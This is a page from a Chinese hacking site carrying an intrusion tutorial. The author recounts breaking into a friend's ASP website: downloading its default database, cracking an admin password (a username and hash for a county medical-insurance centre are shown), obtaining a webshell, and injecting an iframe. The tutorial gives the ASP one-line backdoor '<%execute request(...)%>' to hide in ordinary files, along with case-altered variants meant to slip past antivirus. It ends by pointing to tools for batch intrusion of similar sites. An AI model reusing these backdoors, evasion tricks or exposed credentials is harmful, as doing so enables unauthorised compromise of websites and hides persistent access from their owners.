欢迎来到 黑吧安全网聚焦网络安全前沿资讯,精华内容,交流技术心得!

对朋友站点的一次友情检测

  • 软件大小:8.10 MB
  • 软件语言:简体中文
  • 软件类型:入侵实例
  • 软件授权:免费教程
  • 更新时间:2006-10-09
  • 标签:
  • 开 发 商:http://www.myhack58.com
  • 应用平台:WinXP, Win7, Win8, WinAll
软件评分
网友评分:3

同类人气软件

立即下载

对朋友站点的一次友情检测软件介绍

                     对朋友站点的一次友情检测
                            
                          by:python    qq:330181903


声明:

1、本教程制作纯属无聊,没有任何技术含量。

2、教程发布之时,我已经通知站长修复漏洞,恳请大家不要再骚扰此站。

3、我不是什么黑客,也不会做入侵他人网站的行为。

4、所有测试我均备份其文件作为测试,没有破坏它的任何数据。


一、误入

     昨晚访问我一个朋友网站时候多输入一个cn,导致到了另一个网站,哈,我另一个朋友的
    
     站啊,很漂亮,没有听他说啊?

二、踩点
 
    平常看他不像对网页制作有研究的,应该是采用asp源码搭建的,这里,可以通过2种方法,
   
     1、查看源文件

     2、到www.seeknot.com搜索源码来源
    
     既然如此,有情帮他看看安全如何了,哈哈.....
    
三、发现
   
    通过检测,没有明显的注入点,看来注入没有希望了!

     察看源文件,background="images/gaobei_background.gif,搜索gaobei

     哈哈,高贝系统,接下来,下载源文件,看看默认数据库是Database/GaoBeiSys_V2x.mdb

     呵呵~~~能下载.....

    为了节约时间,我已经下载了。
    
    md5加密的可以到md5在线解密http://www.md5.org.cn/解密。

    呵呵~~~运气不错!
  
   用户名:丘北县医保中心
 
   密码:8ad9902aecba32e2  000000

    很慢......

四、隐藏

   非常经典的通过上传图片备份数据库取得webshell,
 
   这里说明一下,有时候备份不成功,多半是服务器杀毒软件很NB,请加密你的马!

   ok,成功了,

   测试挂马代码:<iframe src="http://hot.yesky.com/show/join2.htm" width=776 height=154 marginheight=0 marginwidth=0 frameborder=0 scrolling=no></iframe>

   如何隐藏我们的马呢?

   我们可以在任意正常的asp文件里插入一句话木马,<%execute request("value")%>

   这样,站长恐怕要把所有文件都仔细检查一遍,呵呵~~~~~有点“无耻”

  ok,成功,我不上传了....

   注意:如果导致插入木马的文件无法显示或者出现错误,

   那么,我们可以修改成这样 <%if Request("#")<>"" then eXcute(Request("#"))%>

   如果被杀毒软件查杀,可以这样<%iF ReQuest("#")<>"" thEn eXcUte(Request("#"))%>

   目的:修改字母大小写或者进行加密躲过杀毒软件
 

五,总结

    可以使用挖掘机批量入侵类似核心网站,这个网上很多教程,我就不演示了。

                         

                       
     
                                                                        
                                                     qq:330181903


  

  • 热门下载